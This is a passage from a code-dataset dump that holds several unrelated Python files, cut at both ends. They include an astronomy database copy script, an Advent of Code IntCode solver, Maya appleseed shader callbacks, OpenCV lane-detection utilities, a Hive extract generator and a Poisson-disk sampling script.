plot.\n plt.clf() #Clears figure, in order to create a tidy plot.\n time.sleep(3600) #Code is executed each hour.\n else: \n time.sleep(3600) \n\n except KeyboardInterrupt: #Exits program.\n break \n\n","sub_path":"sensehat/DashboardPi/Example1/DashboardPi.py","file_name":"DashboardPi.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"235721756","text":"# Script to copy over BDNYC database sources into SIMPLE\n\nfrom astrodbkit2.astrodb import Database, 
copy_database_schema\nfrom sqlalchemy import types # for BDNYC column overrides\n\n# Establish connection to databases\n\n# Note that special parameters have to be passed to allow the BDNYC schema work properly\nconnection_string = 'sqlite:///../BDNYCdevdb/bdnycdev.db'\nbdnyc = Database(connection_string,\n reference_tables=['changelog', 'data_requests', 'publications', 'ignore', 'modes',\n 'systems', 'telescopes', 'versions', 'instruments'],\n primary_table='sources',\n primary_table_key='id',\n foreign_key='source_id',\n column_type_overrides={'spectra.spectrum': types.TEXT(),\n 'spectra.local_spectrum': types.TEXT()})\n\n# SIMPLE\nconnection_string = 'sqlite:///SIMPLE.db'\ndb = Database(connection_string)\n\n# Copy first publications that are not already in SIMPLE\ntemp = db.query(db.Publications.c.name).all()\nexisting_simple = [s[0] for s in temp]\ntemp = bdnyc.query(bdnyc.publications)\\\n .filter(db.publications.c.shortname.notin_(existing_simple))\\\n .all()\n\n# Reformat data into something easier for SIMPLE to import\nnew_db_mapping = {'DOI': 'doi', 'shortname': 'name'}\ndata = [{new_db_mapping.get(k, k): x.__getattribute__(k)\n for k in x.keys() if k not in 'id'\n }\n for x in temp]\n\ndb.Publications.insert().execute(data)\n\n# Verify insert and save to disk\ndb.query(db.Publications).count()\ndb.save_db('data')\n","sub_path":"scripts/bdnyc_object_copy.py","file_name":"bdnyc_object_copy.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92791769","text":"#!/usr/bin/env python3\n\nimport argparse\nimport collections\nimport sys\n\n# General day 2 stuff\n\nclass IntCode(object):\n\n INSTR_ZERO= set([99])\n INSTR_ONE = set([3, 4, 9])\n INSTR_TWO = set([5, 6])\n INSTR_THREE= set([1, 2, 7, 8])\n\n def __init__(self, size, io_in, io_out):\n self.memory = [0] * size\n self.relative_offset = 0\n self.program_counter = 0\n self.cycle_counter = 0\n self.steps = -1\n self.io_in = io_in\n self.io_out = io_out\n\n def instr_args(self, instr):\n \"\"\"returns the number of arguments for a given instruction\"\"\"\n if instr in IntCode.INSTR_ZERO:\n return 0\n elif instr in IntCode.INSTR_ONE:\n return 1\n elif instr in IntCode.INSTR_TWO:\n return 2\n elif instr in IntCode.INSTR_THREE:\n return 3\n else:\n raise Exception(\"Illegal instruction: %s\" % str(instr))\n\n def decode_modes(self, instr):\n return ((instr // 10000) % 10,\n (instr // 1000) % 10,\n (instr // 100) % 10,\n (instr % 100))\n\n def exec(self):\n pc = self.program_counter\n pinstr = self.memory[pc]\n # Not all modes may be applicable, they're fetched anyway.\n mode2, mode1, mode0, instr = self.decode_modes(pinstr)\n argc = self.instr_args(instr)\n args = self.memory[pc + 1:pc + 1 + argc]\n \n self.cycle_counter += 1\n # Jumps reset this later.\n self.program_counter += argc + 1\n if instr == 1:\n self.mem(args[2], mode2,\n val=self.mem(args[0], mode0) + self.mem(args[1], mode1))\n elif instr == 2:\n self.mem(args[2], mode2,\n val=self.mem(args[0], mode0) * self.mem(args[1], mode1))\n elif instr == 3:\n self.mem(args[0], mode0, val=self.io_in())\n #raise Exception(\"not implemented\")\n elif instr == 4:\n self.io_out(self.mem(args[0], mode0))\n #raise Exception(\"not implemented\")\n elif instr == 5:\n if self.mem(args[0], mode0) != 0:\n # we increment program counter later.\n self.program_counter = self.mem(args[1], mode1)\n elif instr == 6:\n if self.mem(args[0], mode0) == 0:\n # we increment program counter later.\n 
self.program_counter = self.mem(args[1], mode1)\n elif instr == 7:\n self.mem(args[2], mode2,\n val=int(self.mem(args[0], mode0) < self.mem(args[1], mode1)))\n elif instr == 8:\n self.mem(args[2], mode2,\n val=int(self.mem(args[0], mode0) == self.mem(args[1], mode1)))\n elif instr == 9:\n self.relative_offset += self.mem(args[0], mode0)\n elif instr == 99:\n return \"exit\"\n else:\n raise Exception(\"invalid instruction: %s at index: \" % (str(instr), self.program_counter))\n return None\n\n def run(self):\n out = None\n while True:\n if out == \"exit\" or self.steps == self.cycle_counter:\n break\n out = self.exec()\n\n def mem(self, arg, mode, *, val=None):\n if mode not in [0, 1, 2]:\n raise Exception(\"bad mode: %s\" % mode)\n if val is not None:\n # data write\n if mode == 0:\n self.memory[arg] = val\n elif mode == 1:\n raise Exception(\"illegal mode for write: %s\" % mode)\n elif mode == 2:\n self.memory[arg + self.relative_offset] = val\n else:\n if mode == 0:\n return self.memory[arg]\n elif mode == 1:\n return arg\n elif mode == 2:\n return self.memory[arg + self.relative_offset]\n\n\n# Add 2 2tuples\ndef ta(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n return (x1 + x2, y1 + y2)\n\n\nclass Grid(object):\n MOVEMENT = [\n (0,1),\n (1,0),\n (0,-1),\n (-1,0),\n ]\n def __init__(self):\n self.grid = collections.defaultdict(lambda: -1)\n\n def dimensions(self):\n if len(self.grid) == 0:\n return (0, 0)\n xs = [ x for x,y in self.grid.keys() ]\n x_min, x_max = min(xs), max(xs)\n ys = [ y for x,y in self.grid.keys() ]\n y_min, y_max = min(ys), max(ys)\n return (x_max - x_min + 1, y_max - y_min + 1)\n\n def keys(self):\n return self.grid.keys()\n\n def __getitem__(self, pos):\n return self.grid[pos]\n\n def __setitem__(self, pos, value):\n self.grid[pos] = value\n\n def __repr__(self):\n if len(self.grid) == 0:\n return \"\"\n # 3 and -1 are special, 3 is used to mark start. 
-1 for unexplored.\n # visualize the world.\n xs = [ x for x,y in self.grid.keys() ]\n x_min, x_max = min(xs), max(xs)\n ys = [ y for x,y in self.grid.keys() ]\n y_min, y_max = min(ys), max(ys)\n\n out = \"\"\n for y in range(y_min, y_max + 1):\n for x in range(x_min, x_max + 1):\n t = self[(x,y)]\n out += t\n out += \"\\n\"\n\n return out\n\nclass RepairDroid(object):\n def __init__(self, brain_source, world):\n self.brain = IntCode(0, lambda: self.read(), lambda x: self.write(x))\n self.brain.memory = load(brain_source) + [0] * 4096\n self.world = world\n self.x = 0\n self.y = 0\n # index for read\n self.r = -1\n self.last = 0\n\n def run(self):\n self.brain.run()\n\n def read(self):\n \"\"\"\n L,10,L,12,R,6, -> A\n R,10,L,4,L,4,L,12, -> B\n L,10,L,12,R,6, -> A\n R,10,L,4,L,4,L,12, -> B\n L,10,L,12,R,6, -> A\n L,10,R,10,R,6,L,4, -> C\n R,10,L,4,L,4,L,12, -> B\n L,10,R,10,R,6,L,4, -> C\n L,10,L,12,R,6, -> A\n L,10,R,10,R,6,L,4, -> C\n \"\"\"\n data = \"\"\"A,B,A,B,A,C,B,C,A,C\nL,10,L,12,R,6\nR,10,L,4,L,4,L,12\nL,10,R,10,R,6,L,4\nn\n\"\"\"\n self.r += 1\n return ord(data[self.r])\n\n def write(self, val):\n self.last = val\n print(chr(val), end=\"\")\n return\n if val != 10:\n self.world[(self.x, self.y)] = chr(val)\n self.x += 1\n else:\n self.x = 0\n self.y += 1\n\n\ndef load(f):\n contents = []\n for line in f:\n contents.extend(line.split(','))\n return [ int(i) for i in contents ]\n\ndef intersections(w):\n intersections = []\n mx, my = w.dimensions()\n for y in range(my):\n for x in range(mx):\n pos = (x,y)\n if w[pos] != \"#\":\n print(w[pos], end=\"\")\n continue\n is_intersection = True\n for neighbour in [w[ta(pos, n)] for n in Grid.MOVEMENT]:\n if neighbour != \"#\":\n is_intersection = False\n break\n if is_intersection:\n intersections.append(pos)\n print(\"O\", end=\"\")\n else:\n print(w[pos], end=\"\")\n print()\n\n print(\"sum of intersection squares\", sum([x * y for x,y in intersections]))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('program', type=argparse.FileType('r'), nargs='?', default=sys.stdin)\n\n args = parser.parse_args(sys.argv[1:])\n\n w = Grid()\n droid = RepairDroid(args.program, w)\n # Map out the whole station.\n try:\n droid.run()\n print()\n print(\"dust\", droid.last)\n except Exception as e:\n print(e)\n except KeyboardInterrupt:\n pass\n\n # Solve the maze by hand, compress later.\n # Starting facing up.\n\n \"\"\"\n L,10,L,12,R,6,R,10,L,4,L,4,L,12,\n L,10,L,12,R,6,R,10,L,4,L,4,L,12,\n L,10,L,12,R,6,\n L,10,R,10,R,6,L,4,\n R,10,L,4,L,4,L,12,\n L,10,R,10,R,6,L,4,\n L,10,L,12,R,6,\n L,10,R,10,R,6,L4\n \"\"\"\n\n \"\"\"\n L,10,L,12,R,6,\n R,10,L,4,L,4,L,12,\n L,10,L,12,R,6,\n R,10,L,4,L,4,L,12,\n L,10,L,12,R,6,\n L,10,R,10,R,6,L,4,\n R,10,L,4,L,4,L,12,\n L,10 R,10,R,6,L,4,\n L,10,L,12,R,6,\n L,10,R,10,R,6,L4\n \"\"\"\n #print(w)\n #print(\"---\")\n #print()\n\n # Find all the intersection points\n #intersections(w)\n","sub_path":"2019/day-17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"32158213","text":"\n#\n# This source file is part of appleseed.\n# Visit http://appleseedhq.net/ for additional information and resources.\n#\n# This software is released under the MIT license.\n#\n# Copyright (c) 2016-2017 Esteban Tovagliari, The appleseedhq Organization\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated 
documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\n# Maya imports.\nimport pymel.core as pm\nimport maya.mel as mel\n\n# appleseedMaya imports.\nfrom logger import logger\n\n\ndef hyperShadePanelBuildCreateMenuCallback():\n pm.menuItem(label=\"Appleseed\")\n pm.menuItem(divider=True)\n\ndef hyperShadePanelBuildCreateSubMenuCallback():\n return \"shader/surface\"\n\ndef buildRenderNodeTreeListerContentCallback(tl, postCommand, filterString):\n melCmd = 'addToRenderNodeTreeLister(\"{0}\", \"{1}\", \"{2}\", \"{3}\", \"{4}\", \"{5}\");'.format(\n tl,\n postCommand,\n \"Appleseed/Surface\",\n \"appleseed/surface\",\n \"-asShader\",\n \"\"\n )\n logger.debug(\"buildRenderNodeTreeListerContentCallback: mel = %s\" % melCmd)\n mel.eval(melCmd)\n\n melCmd = 'addToRenderNodeTreeLister(\"{0}\", \"{1}\", \"{2}\", \"{3}\", \"{4}\", \"{5}\");'.format(\n tl,\n postCommand,\n \"Appleseed/Textures\",\n \"appleseed/texture\",\n \"-asUtility\",\n \"\"\n )\n logger.debug(\"buildRenderNodeTreeListerContentCallback: mel = %s\" % melCmd)\n mel.eval(melCmd)\n\ndef createRenderNode(nodeType=None, postCommand=None):\n nodeClass = None\n for cl in pm.getClassification(nodeType):\n if \"appleseed/surface\" in cl.lower():\n nodeClass = \"shader\"\n if \"appleseed/texture\" in cl.lower():\n nodeClass = \"texture\"\n\n if nodeClass == \"shader\":\n mat = pm.shadingNode(nodeType, asShader=True)\n shadingGroup = pm.sets(renderable=True, noSurfaceShader=True, empty=True, name=\"{0}SG\".format(mat))\n mat.outColor >> shadingGroup.surfaceShader\n else:\n mat = pm.shadingNode(nodeType, asTexture=True)\n\n if postCommand is not None:\n postCommand = postCommand.replace(\"%node\", str(mat))\n postCommand = postCommand.replace(\"%type\", '\\\"\\\"')\n pm.mel.eval(postCommand)\n return \"\"\n\ndef createRenderNodeCallback(postCommand, nodeType):\n #logger.debug(\"createRenderNodeCallback called!\")\n\n for c in pm.getClassification(nodeType):\n if 'appleseed' in c.lower():\n buildNodeCmd = \"import appleseedMaya.hyperShadeCallbacks; appleseedMaya.hyperShadeCallbacks.createRenderNode(nodeType=\\\\\\\"{0}\\\\\\\", postCommand='{1}')\".format(nodeType, postCommand)\n buildNodeCmd = \"string $cmd = \\\"{0}\\\"; python($cmd);\".format(buildNodeCmd)\n return buildNodeCmd\n\ndef connectNodeToNodeOverrideCallback(srcNode, destNode):\n return 1\n","sub_path":"scripts/appleseedMaya/hyperShadeCallbacks.py","file_name":"hyperShadeCallbacks.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"575646548","text":"# 데이터 베이스 관리자 설정파일\n# 건드리지 말 것\nfrom 
sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\n\nclass DBManager():\n __engine = None\n __session = None\n\n @staticmethod\n def init(db_url, db_log_flag=None):\n DBManager.__engine = create_engine(db_url, echo=db_log_flag)\n DBManager.__session = scoped_session(sessionmaker(\n autocommit=False,\n autoflush=False,\n bind=DBManager.__engine\n ))\n dao = DBManager.__session\n\n return dao\n \n @staticmethod\n def init_db():\n from lib.contact_db.member import Base\n Base.metadata.create_all(bind=DBManager.__engine)\n\n","sub_path":"onad_db.py","file_name":"onad_db.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"274217294","text":"import cv2\nimport math\nimport numpy as np\n\ndef grayscale(img):\n \"\"\"Applies the Grayscale transform\n This will return an image with only one color channel\"\"\"\n return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Or use BGR2GRAY if you read an image with cv2.imread()\n # return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \ndef canny(img, low_threshold, high_threshold):\n \"\"\"Applies the Canny transform\"\"\"\n return cv2.Canny(img, low_threshold, high_threshold)\n\ndef gaussian_blur(img, kernel_size):\n \"\"\"Applies a Gaussian Noise kernel\"\"\"\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\ndef region_of_interest(img, vertices):\n \"\"\"\n Applies an image mask.\n \n Only keeps the region of the image defined by the polygon\n formed from `vertices`. The rest of the image is set to black.\n \"\"\"\n #defining a blank mask to start with\n mask = np.zeros_like(img) \n \n #defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n \n #filling pixels inside the polygon defined by \"vertices\" with the fill color \n cv2.fillPoly(mask, vertices, ignore_mask_color)\n \n #returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n\ndef draw_lines(img, lines, color=[255, 0, 0], thickness=15):\n \"\"\"\n This function draws `lines` with `color` and `thickness`. 
\n Lines are drawn on the image inplace (mutates the image).\n If you want to make the lines semi-transparent, think about combining\n this function with the weighted_img() function below\n \"\"\"\n def remove_outliers(x, outlierConstant):\n a = np.array(x)\n upper_quartile = np.percentile(a, 75)\n lower_quartile = np.percentile(a, 25)\n IQR = (upper_quartile - lower_quartile) * outlierConstant\n quartileSet = (lower_quartile - IQR, upper_quartile + IQR)\n resultList = []\n for y in a.tolist():\n if y > quartileSet[0] and y < quartileSet[1]:\n resultList.append(y)\n return resultList\n\n # Average the positions of lines in format: x1, y1, x2, y2\n def get_mean_coordinates(lines):\n x1s, x2s, y1s, y2s = list(), list(), list(), list()\n slopes = list()\n for line in lines:\n for x1, y1, x2, y2 in line:\n x1s.append(x1)\n x2s.append(x2)\n y1s.append(y1)\n y2s.append(y2)\n if x1 > x2:\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n slope = (y2 - y1) / (x2 - x1)\n slopes.append(slope)\n upper_quartile = np.percentile(slopes, 75)\n lower_quartile = np.percentile(slopes, 25)\n IQR = (upper_quartile - lower_quartile) * 1.5\n bounds = (lower_quartile - IQR, upper_quartile + IQR)\n remove_index_list = []\n for i, s in enumerate(slopes):\n if s < bounds[0] or s > bounds[1]:\n remove_index_list.append(i)\n x1s = [x for i, x in enumerate(x1s) if i not in remove_index_list]\n y1s = [x for i, x in enumerate(y1s) if i not in remove_index_list]\n x2s = [x for i, x in enumerate(x2s) if i not in remove_index_list]\n y2s = [x for i, x in enumerate(y2s) if i not in remove_index_list]\n return np.mean(x1s), np.mean(y1s), np.mean(x2s), np.mean(y2s)\n \n def extrapolate(x1, y1, x2, y2, left=True):\n if x1 > x2:\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n elif x1 == x2:\n if left:\n return x1, img.shape[0], x2, 320\n else:\n return x1, 320, x2, img.shape[0]\n \n def get_line(x1, y1, x2, y2):\n if x1 > x2:\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n slope = (y2 - y1) / (x2 - x1)\n def line(a, getX=True):\n # y - y1 = slope(x - x1)\n if getX:\n return (a - y1 + slope * x1) / slope\n else:\n return slope * (a - x1) + y1\n return line\n \n line = get_line(x1, y1, x2, y2)\n if left:\n x_limit = (0, 450)\n y_limit = (330, img.shape[0])\n x1_new = x_limit[0]\n y1_new = line(x1_new, getX=False)\n if y1_new > y_limit[1]:\n y1_new = y_limit[1]\n x1_new = line(y1_new, getX=True)\n x2_new = x_limit[1]\n y2_new = line(x2_new, getX=False)\n if y2_new < y_limit[0]:\n y2_new = y_limit[0]\n x2_new = line(y2_new, getX=True)\n else:\n x_limit = (490, img.shape[1])\n y_limit = (330, img.shape[0])\n x1_new = x_limit[0]\n y1_new = line(x1_new, getX=False)\n if y1_new < y_limit[0]:\n y1_new = y_limit[0]\n x1_new = line(y1_new, getX=True)\n x2_new = x_limit[1]\n y2_new = line(x2_new, getX=False)\n if y2_new > y_limit[1]:\n y2_new = y_limit[1]\n x2_new = line(y2_new, getX=True)\n return int(x1_new), int(y1_new), int(x2_new), int(y2_new)\n \n \n # Separate lines to left and right\n left_lines = list()\n right_lines = list()\n for line in lines:\n x1, y1, x2, y2 = line[0]\n if x1 >= x2:\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n slope = (y2 - y1) / (x2 - x1)\n if slope <= 0:\n left_lines.append(line)\n else:\n right_lines.append(line)\n \n if len(left_lines) >= 1:\n x1_left, y1_left, x2_left, y2_left = get_mean_coordinates(left_lines)\n x1_left, y1_left, x2_left, y2_left = extrapolate(x1_left, y1_left, x2_left, y2_left, left=True)\n cv2.line(img, (x1_left, y1_left), (x2_left, y2_left), color, thickness)\n \n if len(right_lines) >= 1:\n x1_right, y1_right, x2_right, 
y2_right = get_mean_coordinates(right_lines)\n x1_right, y1_right, x2_right, y2_right = extrapolate(x1_right, y1_right, x2_right, y2_right, left=False)\n cv2.line(img, (x1_right, y1_right), (x2_right, y2_right), color, thickness)\n\n \n\ndef hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap):\n \"\"\"\n `img` should be the output of a Canny transform.\n \n Returns an image with hough lines drawn.\n \"\"\"\n lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n draw_lines(line_img, lines)\n return line_img\n\n# Python 3 has support for cool math symbols.\n\ndef weighted_img(img, initial_img, α=0.8, β=1., λ=0.):\n \"\"\"\n `img` is the output of the hough_lines(), An image with lines drawn on it.\n Should be a blank image (all black) with lines drawn on it.\n \n `initial_img` should be the image before any processing.\n \n The result image is computed as follows:\n \n initial_img * α + img * β + λ\n NOTE: initial_img and img must be the same shape!\n \"\"\"\n return cv2.addWeighted(initial_img, α, img, β, λ)\n\n","sub_path":"p1-finding-land-line/code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"441997571","text":"#!/usr/bin/python\nfrom os.path import expanduser\nfrom platform import system\nfrom datetime import datetime\nimport optparse\nimport utilities\n\n\ndef main():\n parser = optparse.OptionParser(usage=\"usage: %prog [options values]\",\n version=\"%prog 1.0\")\n\n parser.add_option('-l', '--lkpfile',\n help='input tab delimited Col Meta Data File, including path'\n 'Structure: Source DB, Table, Cols, Col_to_Extract, Extract_Col_DataType',\n dest='lkp_file')\n parser.add_option('-d', '--dbname',\n help='Database of Table to be fork lifted into Hive',\n dest='db_name')\n parser.add_option('-t', '--table',\n help='Table name to be fork lifted into Hive',\n dest='table_name')\n parser.add_option('-a', '--attrib_file',\n help='input tab delimited Table Meta Data File, including path'\n 'Structure: Source DB, Table, Refresh rate, CDC Column, Filter Condition,'\n 'Partition Clause, Bucketing Clause, Staging_DB in Hive, Target_DB in Hive',\n dest='tbl_attrib_file')\n parser.add_option('-w', '--write',\n help='Optional: directory Path where the scripts will be generated',\n dest='tgtdir',\n default='~/tmp')\n parser.add_option('-f', '--filedate',\n help='Optional: Date used in name of extract file',\n dest='fdate',\n default=datetime.now().strftime(\"%Y%m%d\"))\n\n (opts, args) = parser.parse_args()\n\n if opts.lkp_file is None:\n parser.print_help()\n utilities.abort_with_msg(\"Please provide Column Meta Data File with Path\")\n if opts.tbl_attrib_file is None:\n parser.print_help()\n utilities.abort_with_msg(\"Please provide Table Meta Data File with Path\")\n if opts.db_name is None:\n parser.print_help()\n utilities.abort_with_msg(\"Please provide Source Database Name\")\n if opts.table_name is None:\n parser.print_help()\n utilities.abort_with_msg(\"Please provide Source Table/View Name\")\n\n current_os = system()\n if current_os != \"Windows\":\n dir_sep = \"/\"\n #utilities.check_if_running('extract2Hive')\n else:\n dir_sep = \"\\\\\"\n\n utilities.print_info(\"Current OS: \" + current_os)\n utilities.print_info(\"Date used for Filenames: \" + opts.fdate)\n\n db_nm = opts.db_name.strip().upper()\n 
tbl_nm = opts.table_name.strip().upper()\n\n base_dir = opts.tgtdir if opts.tgtdir[-1] == dir_sep else opts.tgtdir + dir_sep\n log_dir = expanduser('~') + dir_sep + \"log\" + dir_sep\n\n # Fetch Table attributes for Filtering, Partition & Distribution\n tbl_meta = utilities.read_file(arg_db_nm=db_nm, arg_tbl_nm=tbl_nm,\n arg_input_file=opts.tbl_attrib_file, arg_content_type='TABLES')\n\n col_meta = utilities.read_file(arg_db_nm=db_nm, arg_tbl_nm=tbl_nm,\n arg_input_file=opts.lkp_file, arg_content_type='COLS')\n\n script_dict = utilities.gen_script_from_tmplt(arg_base_dir=base_dir, arg_tbl_meta=tbl_meta,\n arg_col_meta=col_meta, arg_dir_sep=dir_sep)\n\n if len(script_dict) == 0:\n utilities.abort_with_msg(\"No Templates Generated\")\n\n utilities.run_extract(arg_tbl_meta=tbl_meta,\n arg_script=script_dict[\"extract\"],\n arg_log_dir=log_dir,\n arg_passwd_file=base_dir + 'common/ENV.scriptpwd.properties',\n arg_date_for_extract=opts.fdate)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"genscr.py","file_name":"genscr.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"304911115","text":"#encoding= utf-8\r\nimport random\r\nimport math\r\nimport pygame # draw point\r\nimport numpy as np\r\nfrom scipy import stats\r\nimport copy\r\n\r\n#station_data format\r\n#pos_x pos_y nor_x nor_y isSampled coverage ebt com_label\r\n#samples format\r\n#nor_x nor_y [coverage ebt com_label index_in_all ]\r\n#samples_index format\r\n#[index1. index2. ... ]\r\n\r\ndef readData(w2v_file):\r\n station_data = [];\r\n fo1 = open(w2v_file,'r',encoding=\"utf-8\"); \r\n for line in fo1.readlines():\r\n term = line.strip().split(' ');\r\n station_data.append([float(term[0]),float(term[1])]);\r\n v1 = [x[0] for x in station_data];v2 = [x[1] for x in station_data]; \r\n max1 = max(v1);min1 = min(v1);max2 = max(v2);min2 = min(v2);\r\n nor1 = max1 - min1;nor2 = max2 - min2;\r\n index = 0;\r\n for item in station_data:\r\n x = item[0]; y = item[1];\r\n station_data[index].append((x-min1)/nor1);\r\n station_data[index].append((y-min2)/nor2);\r\n station_data[index].append(0);\r\n index +=1;\r\n return station_data;\r\n \r\ndef distance(p1, p2):\r\n p_diff = (p2[0] - p1[0], p2[1] - p1[1]);\r\n return math.sqrt(math.pow(p_diff[0], 2) + math.pow(p_diff[1], 2));\r\n \r\ndef is_in_circle(p):\r\n #d = distance(p, (0, 0));\r\n if(p[0]<1 and p[0]> 0 and p[1]< 1 and p[1]>0):\r\n return True;\r\n else:\r\n return False;\r\n\r\ndef generate_random_point(o, r,dataset):\r\n # Generate random point form dataset\r\n i = int(random.random()*len(dataset));\r\n ix = dataset[i][2];\r\n iy = dataset[i][3]; \r\n return [ix, iy];\r\n\r\ndef kde_fun(data):\r\n data1 = []; \r\n for item in data:\r\n data1.append([item[2],item[3]]);\r\n data1 = np.array(data1);\r\n values = data1.T; \r\n kde = stats.gaussian_kde(values);\r\n return kde;\r\n\r\ndef generate_points(kde_function,dataset,oriset,radius):\r\n samples = [];\r\n samples_index = [];\r\n active_list = []; \r\n# for i in range(0,4500):\r\n# samples.append([dataset[i][2],dataset[i][3]]);\r\n len_s = len(dataset);\r\n # Choose a point randomly in the domain.\r\n i = int(random.random()*len_s);\r\n ix = dataset[i][2];\r\n iy = dataset[i][3]; \r\n initial_point = [ix, iy];\r\n samples.append(initial_point);\r\n del(dataset[i]);\r\n # remove the adj of initial point\r\n minimum_dist = float(kde_function(np.array(initial_point)));\r\n minimum_dist = radius * 1/(minimum_dist * 1000)\r\n index = 
0;\r\n points = [];\r\n while (index < len(dataset)):\r\n ix = dataset[index][2];\r\n iy = dataset[index][3];\r\n if(distance(initial_point, [ix,iy])< minimum_dist):\r\n points.append([ix,iy]); \r\n del(dataset[index]);\r\n index+=1;\r\n samples_index.append(points);\r\n \r\n active_list.append(initial_point); \r\n while len(active_list) > 0:\r\n # Choose a random point from the active list.\r\n p_index = random.randint(0, len(active_list) - 1);\r\n random_p = active_list[p_index];\r\n \r\n found = False; \r\n # Generate up to k points chosen uniformly at random from dataset\r\n k = 30\r\n for it in range(k):\r\n minimum_dist = float(kde_function(np.array(random_p)));\r\n minimum_dist = radius * 1/(minimum_dist * 1000)\r\n pn = generate_random_point(random_p, minimum_dist,dataset); \r\n fits = True;\r\n # TODO: Optimize. Maintain a grid of existing samples, and only check viable nearest neighbors.\r\n for point in samples:\r\n if distance(point, pn) < minimum_dist:\r\n fits = False;\r\n break \r\n if fits:\r\n samples.append(pn);\r\n active_list.append(pn);\r\n index = 0;\r\n points = [];\r\n while (index < len(dataset)):\r\n ix = dataset[index][2];\r\n iy = dataset[index][3];\r\n if(distance(pn, [ix,iy])< minimum_dist):\r\n points.append([ix,iy]);\r\n del(dataset[index]); \r\n index+=1;\r\n samples_index.append(points);\r\n found = True;\r\n print(str(len(samples)) + \" :\" + str(len(dataset)) + \"-\" + str(minimum_dist));\r\n break;\r\n \r\n if not found:\r\n active_list.remove(random_p);\r\n print(len(active_list));\r\n # Print the samples in a form that can be copy-pasted into other code.\r\n #print(\"There are %d samples:\" % len(samples))\r\n #for point in samples:\r\n # print(\"\\t{%08f,\\t%08f},\" % (point[0], point[1])) \r\n \r\n return samples,samples_index;\r\n\r\ndef add_coverage_attr(station_data,coverage_file):\r\n fr = open(coverage_file,'r',encoding='utf-8');\r\n index = 0;\r\n for line in fr.readlines():\r\n station_data[index].append(float(line));\r\n index += 1;\r\n \r\ndef add_ebt_attr(station_data,ebt_file):\r\n fr = open(ebt_file,'r',encoding='utf-8');\r\n index = 0;\r\n for line in fr.readlines():\r\n station_data[index].append(float(line));\r\n index += 1;\r\n\r\ndef add_com_attr(station_data,name_file,id2label_file):\r\n fr1 = open(name_file,'r',encoding='utf-8');\r\n fr3 = open(id2label_file,'r',encoding='utf-8');\r\n dict_id2label ={};\r\n index = 0;\r\n for line in fr3.readlines():\r\n term = line.strip().split(',');\r\n index += 1;\r\n if (index > 1):\r\n dict_id2label[term[0]] = term[1];\r\n \r\n index = 0;\r\n for line in fr1.readlines():\r\n term = line.strip().split('-') \r\n labelA = dict_id2label[ term[0] ]; \r\n labelB = dict_id2label[ term[1] ]; \r\n if(labelA == labelB):\r\n station_data[index].append(labelA+'-'+labelB);\r\n else:\r\n station_data[index].append(labelA+'-'+labelB);\r\n index += 1;\r\n\r\ndef remove_coverage(samplers,samplers_index,all_data): \r\n len_samplers = len(samplers);\r\n for i in range(0,len_samplers):\r\n maxC = -1; index_j = 0; temp_c = samplers[i][2][0]; \r\n len_j = len(samplers_index[i]);\r\n for j in range(0,len_j):\r\n j = j + random.randint(0,int(len_j/10));\r\n if(j >= len_j):\r\n break;\r\n tbd = samplers_index[i][j]; \r\n c = tbd[2][0];\r\n if(temp_c > c and maxC < temp_c - c): \r\n maxC = temp_c - c;\r\n index_j =j; \r\n if(index_j == 0):\r\n continue;\r\n print(samplers_index[i][index_j]);\r\n temp = samplers[i];\r\n samplers[i] = samplers_index[i][index_j];\r\n 